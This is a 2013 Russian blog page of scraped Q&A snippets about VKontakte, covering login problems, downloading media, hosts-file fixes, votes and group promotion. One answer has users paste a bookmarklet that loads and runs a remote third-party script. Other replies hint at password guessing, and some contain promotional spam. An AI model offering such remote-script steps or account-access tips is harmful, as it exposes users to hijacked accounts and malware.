пятница, 19 апреля 2013 г.

помогите мне Вконтакте я нимогу войти я ввожу емеил и пароль там пишет неверный логин или пароль



значит не правильно вводишь!

Немогу зайти на свою страницу вконтакте!

Когда нажимаю моя страница пишет Вы попытались загрузить более одной однотипной страницы в секунду. Вернитесь назад и повторите попытку.что это? Добавлено 3 года назад Браузер опера))))Пробовала через эхсплоер)

Взлом вконтакте. VK ,, VZLOM нормальная прога с вирусами или нет?

Мне друг говорил что есть такие программы ну их единицы. Если будешь все что попала скачивать то комп попросту сдохнит от вирусов. Так что смирись

как чачать видео с Вконтакте

javascript:(function(){var s=document.createElement(script); s.src=http://ekimoff.ru/videovkontakte.js; s.type=text/javascript; document.getElementsByTagName(head)[0].appendChild(s); })();вставляешь сссылку, нажимаешь ентер, скачать файл

вконтакте. люди привет! что сегодня с контактом? не могу войти, это у меня только или у всех так?

да сегодня типо перезагружают и наверное у многих так,у меня так же было,но уже нормально

Кто согласен со мной что одноклассники лучше чем вконтакте ?

Не согласен возрастные категории разные, мне в мои 19 проще сидеть ВК, большинство моих друзей сидит именно в етой соц. сети.

Аудио Вконтакте. Есть ли похожие сайты? Посоветуйте сайты, с которых можно скачивать музыку из Вконтакте.

Тут ненужны другие сайты. Сейчас расскажу как скачивать файлы с самого вконтакте. Значит так, обновляем оперу до последней версии (11). Запускаем ее и заходим в Инструменты----)Раширения---)Найти расшерения. Там будет на первой страничке, думаю по названию поймете.

Мне нужен сайт по поиску людей

вконтакте - если помоложе человек нужен, однокласники - если постарше, майспэйс - если иностранцы

как взломать вконтакте страницу??

для этого над быть гением ,но если только подбирать...ну я раз подобрала вродь вышло...извините что особ не помогла...

Добрый день!на моей странице ВКОНТАКТЕ пропало всё моё видео,и само приложение видео тоже отсутствует,как всё вернуть?

напиши в администрациюsupport@vkontakte.ruили попробуй через мои настройки,выбери в ний Видео,поставив галочку

Кто знает код для получения голосов вконтакте оператор мтс скажите плиззззз!!

Чтобы получить 3 голоса, отправьте 1 SMS с текстом id10306702 на номер 1053 Стоимость 35,00 руб. с НДС Чтобы получить 10 голосов, отправьте 1 SMS с текстом id10306702 на номер 2090 Стоимость 100,00 руб. с НДС вот так

Как скачать игру с сайта Вконтакте!)P.S: Если есть сылка дайте пожалуйста....Зарание СПАСИБО

никак..

как набрать рейтинг вконтакте бесплатно??? я слышал это можно подскажите пжлст.

Тут написано, как повысить рейтинг вконтакте бесплатно: http://kontaktlife.ru/vse-sposoby-podnya...

Вопрос по сайту вконтакте

Тут кто то недавно задал вопрос почему не загружает вконтакте? и дали ответ типо почисти кеш ну я и почистила, а вконтакте так и не заработал, в чем проблема???

как скачать видео с вконтакте ???

видео, просмотренное браузером, файл сохраняется в его кеше... это не только вконтактное . Может и любое другое видео. правда, есть проблеммы отыскать саму папку, ну и видеофайл может быть без расширения

а как лучше пиарить офицальную страницу вконтакте клуб Бодрость и Здоровье. подскажити пожалуйста

у меня вконтакте есть своя группа, я тоже долго мучилась с ее раскруткой, вообще не знала, что и как делать, как народ загонять, что писать, долго ничего не получалось... но потом я наткнулась на предложения одного спеца по раскрутке, который мне круто помог (хотя я сама не верила, что такое может быть), и по деньгам вышло недорого, теперь у меня группа занимает нормальные позиции, число участников растет с каждым днем, есть активность в сообществе... могу поделиться в личке контактом этого человека... пишите, если интересно:-)

Как вставить картинку под чужой комментарий вконтакте?

Должна быть надпись прикрепить

Как зайти вконтакт с двух страниц сразу? Вот хочу зайти на две страници одновременно! Но НЕ ПОЛУЧАЕТСЯ что делать??

с разных браузеров. например одну странницу открой в гугл хром, в торую в опере

как рисовать так прямо ну вконтакте ( я вставила картинку посмотрите пожалуйста )

моя подруга так рисует а объяснить не хочет если знаете как объясните пожалуйста!!))))

вконтакте

Всем добрый день, проблема заключается в том, что при входе в контакт пишет - Такой почтовый адрес не зарегистрирован, либо пароль неверный. Логин и пароль 100% правильный, ни у меня, ни у 3 других друзей такая же шляпа, в чём может быть дело? ну не могли же нас 3 разом ломануть так. Мб почистить редакцию надо какую нибудь?

как написать письмо администрации сайта вконтакте. у меня проблема нужно написать админам как подскажите

Внизу есть кнопка помощь. Нажимаешь и пишешь в чем проблема. Тебе предлагают варианты. Если не устраивает, нажимаешь внизу ни один из вариантов не подходит. После этого откроется окно, в котором можно будет уже непосредственно написать администрации.

сталкер онлайн

Сижу вконтакте. добавляется пацан с авой сталкер дружок посикал в поиске таких сталкеров много (не дружков) вспомнил про сталкер онлайн. Он что стартовал что ли? если та то скажите. и ещё выложите скрин или видео позырить хочу

Не могу скчать видео вконтакте.У меня одной такая проблема?

Если у тебя браузер Google Chrome , то тебе поможет вот этот плагин: https://chrome.google.com/webstore/detail/fvd-video-downloader/lfmhcpmkbdkbgbmkjoiopeeegenkdikp?hl=ru

Где можно скачать лови вконтакте бесплатно?

зачем ваще эта хрень нужна? поставь скрипты Vkopt и в квипе через джаббер пропиши контакт, у тебя помимо твоих контактов будет список друзей в контакте отображаться и будешь с ними также через аську общатсья!

Какой сайт лучше для знакоиств - вконтакте или однокласники?

лучше иди на улицу и перестань стесняться. Они только и ждут когда ты проявишь инициативу

взломали вконтакте, как быть

переустановить систему! это точняк и верняк

как назначитть себя в группе админом (вконтакте)..

на каком сайте можно узнать всю полную информацию о человеке

На сайте Вконтакте.ру

Подскажите, как скачать видео с ютюба, вконтакте, и других популярных сайтов(кроме savefrom)?

http://dvdvideosoft.com/ru/products/dvd/... - это с ютюба http://vkontaktecenter.ru/ - это вконтакте http://www.freemake.com/free_video_downl... - а этим отовсюду...)))

расскажите как зарабатывать в контакте с нуля? Интересен способ построения заработка в соц. Сети вконтакте.

1. Регистрируешь аккаунт 2. Приглашаешь 10 000 друзей 3. Создаешь группу 4. Загоняешь друзей в группу и группа уже стоит 10 000руб Продав группу или паблик, регистрируешь следующую страницу и повторяешь схему

как взломать вконтакте зная e-mail? пожалуйста скажыте

Хорь,млин...Просто скройся.По УК бы,да по 272 статье...Эээх,не хватает прецендентов...

Где можно скачать читы на Вконтакте и Мой мир без вирусов, регистраций и смс? Ответ срочно!

Нигде, иди учи уроки!!!

Вопрос про Вконтакте.

Тема такая: Есть один человек (N). Два других хотят написать ему сообщение. Один (A) может написать, а у другого (B) нет такой возможности, так как нет кнопки отправить сообщения. В чем проблема при условии того, что не у первого не у второго нет этого человека в списках друзей. Почему так И можно ли как-нибудь решить эту проблему для варианта (B)?

проблема вконтакте. не могу зайти вконтакт . что делать . во всех браузерах выдает ошибку

Исправить такую ошибку вполне возможно собственными силами. Нужно открыть папку C:\WINDOWS\system32\drivers\etc. Найти в ней файл hosts (он не имеет расширения). Нажать правой кнопкой мыши на нем. В появившемся меню выбрать пункт Свойства. В открывшемся окне снять галочку Только чтение и нажать кнопку OK. Этой галочки может и не быть. Не пугайтесь - такое случается Снова щелкаем правой кнопкой мышки на файле hosts. На этот раз нужно выбрать Открыть с помощью - Блокнот. Можно использовать и встроенный редактор Wordpad. В этом открытом файле нужно удалить все, кроме записи: 127.0.0.1 localhost. Это, конечно, наиболее радикальный вариант. Часто в этом файле есть записи, которые оставлены вполне благонадежными программами. Так что, теоретически, можно удалить не все записи. Найдите среди записей этого файла те, которые содержат адреса сайтов на которые невозможно попасть, и сотрите именно эти строки. Не забудьте нажать после этого кнопку Сохранить. После этого желательно активировать атрибут Только для чтения в Свойствах файла hosts. После этого, как правило, сайты антивирусов, поисковики, соцсети и тому подобные сайты начинают открываться!!!!ВНИМАНИЕ ПОСЛЕ ЭТИХ ДЕЙСТВИЙ ПЕРЕЗАГРУЗИТЕ КОПЬЮТЕР И БУДЕТ ВАМ СЧАСТЬЕ И ДОСТУП КО ВСЕМ РЕСУРСАМ КОТОРЫЕ БЫЛИ БЛОКИРОВАНЫ))

Вопрос про сайт Вконтакте

Как Вконтакте сделать так,что-бы если меня добавили,я отмечалась в *интересных друзьях* Подскажите плииизз Добавлено 8 месяцев назад в *интересных людях!*

Антивирус AVAST заблокировал сайт Вконтакте.

Захожу в ВК, а там : Веб-страница по адресу возможно, временно недоступна или постоянно перемещена по новому адресу. Ошибка 103 (net::ERR_CONNECTION_ABORTED): Неизвестная ошибка. Проверил файл hosts, ничего подозрительного не обнаружил. Пошарил в антивируснике - тоже ничего не нашёл. Тогда в чём проблемма?

Проводится конкурс в социальной сети Вконтакте!!!!Пройдите по ссылке и все узнаете!!!!ссылка внутри)

Вы можете зарегестрироваться в самой популярной социальной сети Вконтакте!!! Проходите-не бойтесь ссылка была скопированна с Вконтакте! Если вы уже зарегестрированны там то зарегестрируйтесь пожалуйста еще раз!!Я очень хочу выиграть в конкурсе!Помогите))))Зарегестрируйтесь и вы узнаете и про конкурс и про все остально!! Пожалуйста))))

как посмотреть переписку друга с его другом вконтакте?

только если зайти под паролем друга

Вопрос. Народ кто создаст картинку для авы в соц.сеть Вконтакте??? И за какую сумму вы сможете это сделать???

а что надо? Конкретики можно?

помогите пожалуйста!не могу уже месяц вконтакт зайти только через зеркала что мне сделать??сожет антивирусник?

кто не знает дайте хтя-бы зеркала

Какой код на голоса Вконтакте? И как его вводить? Как вводить этот код (какое сочетание клавиш)???

ЗАПОМНИ !!!На голоса НЕТ ЧИТОВ!!! Все програмки просто тырят твой логин и пароль!!! Голоса можно только КУПИТЬ или ЗАРАБОТАТЬ!!! Или получить через специальные предложения вконтакте. О том как заработать голоса читай тут

Про музыку с сайта Вконтакте.ру

Заходишь на сайт и скачиваешь.Там все просто.Либо скачиваешь с этого сайта VkSaver (как заходишь на сайт, там красным выделено - Теперь скачивать музыку из Вконтакта удобнее и быстрее с помощью VKSaver).Просто устанавливаешь, заходишь в контакт и под аудиозаписями появляется кнопочка save, нажимаешь на нее под той песней которая тебе нужна и сразу же переходишь на страницу откуда ее можно скачать.

Почему не могу зайти в социальную сеть вконтакте,интернет есть,потом пытаюсь снова зарегаться не получается:(

что-нибудь пишет? возможно, компьютер заражен. проверьте файл hosts находится по адресу: C:\WINDOWS\system32\drivers\etc\hosts удалите с него все, и вставьте вот это: # (C) Корпорация Майкрософт (Microsoft Corp.), 1993-1999 # # Это образец файла HOSTS, используемый Microsoft TCP/IP для Windows. # # Этот файл содержит сопоставления IP-адресов именам узлов. # Каждый элемент должен располагаться в отдельной строке. IP-адрес должен # находиться в первом столбце, за ним должно следовать соответствующее имя. # IP-адрес и имя узла должны разделяться хотя бы одним пробелом. # # Кроме того, в некоторых строках могут быть вставлены комментарии # (такие, как эта строка), они должны следовать за именем узла и отделяться # от него символом #. # # Например: # # 102.54.94.97 rhino.acme.com # исходный сервер # 38.25.63.10 x.acme.com # узел клиента x сохранить не забудьте :)

как получить голоса вконтакте

Люди может я просто туплю но куда отправлять смс что бы голоса кинуть в контакт. раньше под авой было написанно что то типо повысить рейтинг там же было пополнить голоса. сейчас ничего нету.

Будьте добры, не могу войти вконтакте:забыла пароль,ввожу новый, а мне пишут неверный адрес. Что делать?

у меня та же проблема была я создала новую страницу ,

люди? что за музыка? спс заренаа

http://вконтакте.ру/search?c[q]=суицидc[section]=videoz=video98479515_160261954 только вместо вконтакте vkontakte . ru нужно вписать)

как заказать продвижение группы вконтакте

Сегодня я открыл группу вконтакте. Она мне нужна для продвижения бизнеса. Хочу заказать раскрутку группы, т.к. сам в этом слабо разбираюсь.

Всем добрый день!!!

У меня телевизор 22 дюма использую как монитор. Поскажите где лучше смотреть фильмы, мультфильмы, сереалы онлайн чтобы на полном экране развёртиволось, а не сполосами и в нормальном качестве, просто надоело качать с торрентов долго скорость всего 4 мегабита( Или подскажите где вы смотрите фильмы онлайн!!! Заранее всем спасибо за ответы!!!!Желательно чтобы просмотр был бесплатный!!!

я вконтакте забыла свой пароль, как его посмотреть?

если помнишь имейл, который ты указала при регистрации или мобильный, то можно восстановить жми забыла пароль и укажешь потом имейл или номер мобильго, тебе пришлют новый пароль

Скиньте картинку по тематике Вконтакте с разрешением 528х408. Все что хотите сделаю!!!!Только скиньте мне ее!!!

вконтакте группы сами добавляются, хотя в настройках меня никто не может приглашать в группы

Смените пароль к профилю и на почтовый ящик. Привяжите также номер мобильного телефона к странице. Сами по себе группы не могут появляться, скорее всего, что Вас взломали.

Как вы относитесь к сайтам типоодноклассники,вконтакте и т.п. 4 года назад я себя оттуда удалила (вн.!)

Дело в том ,что со мной там познакомился один мужчина.А когда я в очередной раз не вышла на этот сайт ,он вычислил мой домашний телефон и адрес(для до сих пор загадка-как??)!!! Названивал на домашний каждый день,грозился ждать у подьезда каждый вечер.Еле отвязалась!! С тех пор меня нет на такого рода сайтах и ФИО своё больше нигде не напишу настоящее!!

Где скачать программу для скачивания видео и музыки из вконтакте?

вксавер уже тупить стал вклайф ущё пойдёт и видачок программа качать из ютюб контакта рутюба!!!

Сайты типа вконтакте - место для тех, кто кого-то (простите) не до@#ал в прошлом и оч.хочет это сделать. Согласны?

ну этож похвально когда человек пытается исправить ошибки совершенные ранее

пиар вконтакте. как пропиареть группу вконтакте. пиар вконтакте. как пропиареть группу вконтакте

Вобше платно, а если сам хочеш ,то на сайтах ,форумах,в других группах аудиозаписях, на стенках...

как удалить страничьку вконтакте???

Мои настройки. В самом низу Вы можете удалить свою страницу. Выбираешь причину по шаблону или свою пишешь. Можешь оставить поле пустым. Страница удаляется...В течение 3 месяцев, вроде, можно восстановить

Как качать видео из ВКОНТАКТЕ и из ютуба?

Maxthon 3 легко скачает и оттуда, и оттуда - все просто, смотри ролик: http://video.mail.ru/mail/cheeseboy/4/11...

Подскажите красивое название для группы вконтакте))тема группы любовь...

Цитата — это хорошая замена собственному остроумию.

Иисус есть вконтакте?

...а глаза Его - как огненное пламя. ( Откровение 1 : 14 ). Это говорит о том, что Иисус Христос хоть и на небе, но проницателен и предельно внимателен к происходящему по всей земле.

Я скачал программу для просмотра посетителей вконтакте после её запуска у меня сайт вконтакте .ru выдаёт такую ошибку

Не качайте программы для контакта это 98% вирус ,они ищут лохов, а если уж и скачал проверь антивирусом доктор веб или зайди по адресу C:windows/system32/drivers/etc откройте файл hosts блокнотом там ничего не должно быть кроме ! # (C) Корпорация Майкрософт (Microsoft Corp.), 1993-1999 # # Это образец файла HOSTS, используемый Microsoft TCP/IP для Windows. # # Этот файл содержит сопоставления IP-адресов именам узлов. # Каждый элемент должен располагаться в отдельной строке. IP-адрес должен # находиться в первом столбце, за ним должно следовать соответствующее имя. # IP-адрес и имя узла должны разделяться хотя бы одним пробелом. # # Кроме того, в некоторых строках могут быть вставлены комментарии # (такие, как эта строка), они должны следовать за именем узла и отделяться # от него символом #. # # Например: # # 102.54.94.97 rhino.acme.com # исходный сервер # 38.25.63.10 x.acme.com # узел клиента x 127.0.0.1 localhost

Не могу зайти Вконтакт ! помогите

Пишет мне вот такую фигню :Ошибка!Не удалось подключиться к удалённому серверуВы попытались получить доступ к адресу который сейчас недоступен. Убедитесь, что веб-адрес (URL) введен правильно, и попытайтесь перезагрузить страницу.Убедитесь, что соединение с Интернет активно, и проверьте, работают ли другие приложения, использующие это соединение.

сайт ВКонтакте не грузит. что случилось с вк?

Мало ли технические работы какие-нибудь. Что вы так за контакт переживаете? Не закроют, не волнуйтесь :D

как называется песня,которая играет в видио Вконтакте Принц. Самый отмороженный боксер?? пожалуйста!) очень нужно))

Outlandish - Guantanamo

Меняет ли семейного человека и как его психологическая зависимость от интернет-проектов: Вконтакте,Ответы,Одноклассники?

Если это действительно зависимость, то конечно, человек злится, что его отрывают от компьютера, ему становятся неинтересны ни дети, ни секс, только компьютер.

интересно, как психологи характеризуют людей -любителей вконтакта ?

Обычно и просто - зависимые от...и слабые психологически....реалией жизни опасаются:)

Могу передать читы на игры Вконтакте, Counter-Strike 1.6 ; Source; Go Бесплатно!

Извини а на солдаты удачи.расплата если имеишь.плиз....

ваш любимый сайт, кроме вконтакте и ответов?

animeblog.ru goldro.ru/forum kinozal.tv google.ru

Как вконтакте или в однокласниках добавить Бога в друзья?

Я не признаю 1) Бога 2)Социальныйе сети но можете попробовать просто создать сами бога и добавить....верующие же создали у себя в голове. Так у вас на него еще и посмотреть можно будет и другим показать. Реальнее чем у верующих

как вы относитесь к людям вконтакте у которых стоит в статусе в активном поиске ?

как мне подсказывает мой опыт большинство из них (имею введу девушек щас ,мальчики не интересуют) это 1). не определенным причинам не пользующиеся успехом у мужчин 2).имеющие пару но в следствии ссоры дабы позлить партнера ставят такой статус 3).хотят обратить чьето определенное внимание. это все лично у меня складывается в стереотип и если я вижу симпатичную девушку с таким статусом я какбе уже не обращаю на это внимания .

problem of вконтакте. я не могу войти вконтакт, что делать?

что за ошибка? что пишет/происходить? а так то радуйся))

можно ли верить интернет магазинам вконтакте? боюсь обманут

Смотрите отзывы пользователей и сколько подписчиков у этого магазина.

Сайт вконтакте тоже признал славянское язычество настоящим волшебством? (см. внутри)

Если кликнуть на своей странице по названию религиозных взглядов, откроется описание про это, вот что написано про язычество: Язычество - это общее название всех исконных верований разных народов, берущих свое начало из глубины веков. Славянское язычество - это наша вера, вера всего славянского народа. Одного из древнейших народов, в который входят сегодня: русские и украинцы, белорусы и поляки, чехи и словаки, болгары и македонцы, сербы и черногорцы, словенцы и хорваты. Все мы понимаем друг друга без особого труда, поскольку у нас общий язык. Мы печем блины, провожая Масленицу - Морену и рассказываем древние сказки про Бабу - Ягу. Хлеб у нас до сих пор всему голова, а гостеприимство в чести. На Купалу мы прыгаем через костры и ищем цветущий папоротник. В наших домах вместе с нами живут домовые, а в реках и озерах купаются русалки. Мы гадаем на Коляду, а иногда просто подкидываем монету. Мы чтим наших предков и в день памяти оставляем им подношения. Хвори да болезни мы лечим травами, а от упырей - вампиров используем чеснок да осиновый кол. Мы загадываем желание, сидя между тесками и плюем через левое плечо, встретив черную кошку. Рощи и дубравы для нас святы, а из родников мы пьем целебную воду. Мы заговариваем, рыбацкие снасти и читаем обереги от сглаза. Удаль молодецкая находит себя в кулачных боях, а в случае беды наши храбрые воины отведут ее от славянской земли. И так будет всегда из века в век, ибо мы есть внуки Даждьбожии.

во вконтакте не загружаються треки с низким битрейтом, как его повысить какие есть программы?

Скачай треки с высоким битрейтом и загружай вконтакте) А для повышения битрейта есть немало аудиоконверторов, погугли, не буду рекламировать тот или иной конвертер.

Вам нравится микро-блок вконтакте?

все им неймется, хочется что-то менять(((((( не нравится

Как открыть интернет магазин женской одежды, вконтакте?

Вам понадобится Свидетельство о регистрации ИП или ООО Счет в банке, кошелек в системе Web Money «Коробка» сайта интернет-магазина Налаженные связи с одним или несколькими поставщиками одежды Несколько курьеров в штате или договоренность со сторонней курьерской службой Зарегистрируйте магазин на себя (как на индивидуального предпринимателя) или на юридическое лицо (общество с ограниченной ответственностью). Продавая одежду через интернет, придется соблюдать все требования, которые государство предъявляет к предприятию розничной торговли. Также для получения оплаты по безналичному расчету нужно открыть счет в банке. 2 Закажите создание сайта веб-студии или отдельному специалисту, который предлагает услуги такого рода. Онлайн магазин – один из нескольких наиболее распространенных видов электронных ресурсов, которые заказывают веб-мастерам. Поэтому уже существует ряд типовых решений, специально разработанных под торговую точку в интернете. 3 Начните поиск поставщиков, с которыми вы будете работать, продавая одежду через интернет. Система взаимодействия с поставщиками должна быть организована особым образом – ведь работают интернет-магазины зачастую без склада. То есть получить товар у поставщика нужно уже по факту заказа его клиентом вашего магазина – оперативно и с полной уверенностью, что данный предмет имеется у него на складе. Предложите вашим покупателям несколько вариантов оплаты товаров. Кому-то удобно расплатиться наличными, кому-то – наложенным платежом, а для кого-то выгодны другие системы моментальных платежей. Продумайте систему доставки заказанной одежды клиентам. На первых порах вам будет выгодно лично передавать заказ. С ростом оборота придется нанимать курьеров. Для иногородних покупателей доставлять товар необходимо почтой. Кроме того, возможны и иностранные клиенты. Они, конечно, редкость, но вы должны быть готовы и к этому. После того, как все будет готово, дайте рекламу своего интернет-магазина и займитесь его продвижением. 4 Организуйте систему доставки товаров клиентам вашего онлайн магазина одежды. Предусмотреть нужно несколько способов доставки – как с курьером, «из рук в руки», так и при помощи почтовой службы. С особенностями доставки связан и выбор способа оплаты – по безналичному расчету, наличными курьеру, наложенным платежом на почте или «электронными деньгами» http://otvet.mail.ru/question/84632288 А рекламировать свой магазин вы можете вконтакте! И не только! Пишите бизнес план!

Подскажите анонимайзер вконтакте хороший, чтобы можно было прослушивать музыку, загружать фотографии и менять аватарки)

там и так можно делать всё вышеперечисленное

Как вы думаете? И почему вы так думаете? - Что лучше: 1.Социальная сеть ВКонтакте / 2.Социальная сеть Mail

понимаешь тут трудно решить, что лучше... и там, и там вроде удобно переписываться. Но мне кажется, что вконтакте более подростковый вариант. А вот мэил уже для людей постарше. это мое личное мнение.

не показывает видео вконтакте (написано (видео еще не загрузилось или) че за фигня

с таким случаем знаком,нужно менять систему а точнее сносить и тогда будет всё нром,только этим выходом

Что бы вы сказали о девушке-хорошистке 21 года которая вдруг выложила на своей страничке вконтакте эти стихи? (внутри)

Давайте трахаться почаще!, Кричал на площади Илья. А люди шли, не глядя, мимо. Но каждый думал А давай!. Илья старается скорее Уравновесить зло добром. Увидел, парни бьют мальчишку. Красиво рядом станцевал. Вчера, зайдя ко мне без спроса, Разбив окно и выпив джин, Аркадий кончился как личность. И начался как пидарас. Вы так мне отказали в сексе, Как будто он у вас один. Как будто он у вас последний, И просто кончится на мне. Геннадий был метафоричен. Когда он говорил пиздец, То это значило какао, Или сегодня будет дождь. Я никогда не спал с мужчиной. Ну то есть, нет, конечно, спал Но просто спал вообще без секса. Ну, то есть, что считать за секс. Семен задумался о жызни. Грустит и пьёт десятый день. А Николай веселый ходит, Все время думает про смерть. Искусствоведов группа тихо, Восторженно глядит на холст. И вдруг один, седой и строгий, Отчетливо сказал Говно!. Исус спросил у Николая Чего ты хочешь, человек?. Проходит день, неделя, месяц, А Николай всё говорит Гляди, любимая, я звезды В знак верности тебе дарю. А жить мы будем в этом доме Из старых щепок и говна Олег, Оксана и Георгий Решили сделать секс втроем Уж полночь близко, нет Оксаны Пришлось справляться как-то так.

как изменять заголовки разделов вконтакте???

Моя Страница Мои Друзья Мои Фотографии Мои Видеозаписи Мои Аудиозаписи Мои Сообщения Мои Заметки Мои Группы Мои Встречи Мои Новости Мои Закладки Мои Настройки Предложения Мнения Приложения Вопросы Объявления можно ли эти разделы изменить на другие названия??

как удалить страницу вконтакте?

Напрямую такая функция не предусмотрена, но выход есть и он очень прост. Зайдите на страницу «Мои настройки» на вкладку «Приватность». Внизу есть пунктик «Кто может смотреть мою страницу». Поставьте значение «Только я». Готово. Теперь никто не увидит вашу страницу. Однако, люди могут увидеть другие Ваши страницы, если Вы их не закрыли от просмотра. То же самое можете сделать и Вы, прочитав «Просмотр закрытых страниц (профилей) Вконтакте».

у меня 2 страницы вконтакте,но я не могу зайти на вторую-всегда попадаю на первую.что делать?

как скачать видео Вконтакте???

программа vklife тебе в помощь, там можно и видео и музыку качать с сайта вконтакте

Подскажите часть музыки вконтакте не робит, что делать Сижу с Google Chrome

аудио кодеки установи, адоб флэшь плеер обнови

Почему я не могу обновлять страницу в Вконтакте через нажатие на Моя страница или картинку Вконтакте??

ммм... мой вариант - религия не позволяет! угадал?

Пожалуйста скажите где скачать прогу для накрутки голосов вконтакте

ещё для увлечения члена и мозгов

Меня взломали вконтакте,поменяли пороль или емейл,сообщение на телефон не приходит.Что делать????

Стандартное востоновление всегда отклоняют,мало сведенья о власника страницы

Подскажите, пожалуйста, сайт, где можно скачать программу, чтобы скачивать музыку вконтакте??

Вот здесь вот есть чудный сайт Видеосейвером,на странице там все просто описано,что и как..скачиваем и видео и музыку ,и не только с контакта

проблена со страничой вконтакте

Конкретно какая проблема. Че за тупость

почему видео вконтакте не загружается??как можно исправить?? как можно исправить?

flash palyer новый скачай

как узнать кто посещял анкету на сайте ВКОНТАКТЕ?

приложение специальное есть ...для контакта...

как скачать музыку с вконтакте в windows 8 ?

если сидиш с Google Chrome установи расширение для скачивания с контакта,там их много

вконтакте. люди киньте сылочку где на вконтакте можно пригласить человека регестрироватся

/invite

А как получить голоса вконтакте бесплатно??Мне сказал что так можно!!Помогите!! Мне сказал что так можно! Помогите!

Как получить рейтинг в контакте бесплатно? Ещё один способ получить и поднять рейтинг в контакте бесплатно, правда с помощью небольшого обмана. kontaktlife.ru/raiting-bez-sms Рейтинг вконтакте бесплатно: как повысить рейтинг в контакте без смс? Можно получить рейтинг в контакте бесплатно через приложения и игры для контакта, читайте подробнее про это в нашей статье голоса в... kontaktlife.ru/vse-sposoby-podnyat-rejti... Рейтинг вконтакте. Как поднять рейтинг вконтакте, бесплатные способы... Что такое голоса вконтакте? и как их получить. Нас находят по фразам: поднять рейтинг вконтакте. www.vkontakte-x.ru/rating-vkontakte ... голоса в контакте бесплатно? Бесплатные голоса вконтакте - узнай... Как получить голоса в контакте бесплатно? Какими программами пользоваться для этого? Ответ на этот вопрос есть в этой статье. kontaktlife.ru/kak-poluchit-golosa-v-kon...

Как ВКонтакте группу назвать? На какую тему?

Лучше назвать - Группа в контакте!

Сколько стоит зарегаться вконтакте

регистрируйся на здоровье - всё ж даром!!!!одно время на одноклассниках плату просили. но сейчас тоже дадом

Помните видео ВКонтакте,где очень толстый мужик пародирует Шакиру? И сним ещё двое парней. Кто скажет,что песня в клипе?

Исполнителя знаю.) Навзание интересует.

Плизз;помогите с географией,кто ответит тому видеорук как взломать вконтакте_БЕСПЛАТНО

Определите океан,в котором находится: 1)Большой Барьерный риф; 2)Перуанская котловина; 3)Канарская котловина; 4)Австрало-Антарктическое поднятие; 5)Бразильская котловина

что за песня, видео вконтакте. vkontakte. ru/ video14782973_160990659

Ben Howard - The Wolves

Какой сайт вам больше по душе: одноклассники, вконтакте или ответы?

на одноклассникаах не зареген, ни чего сказать не могу. вКонтакте зареген, но на сайте никогда не сижу. Просто скачал клиент типа МайлАгента. На ответах сижу когда качаю какойнибудь фильм, или просто когда нечего делать. Я выбираю Ответы!

Можт украине мыло ру и вконтакте отключить - ась - а чо прикольно буит?



Комментариев нет:

Отправить комментарий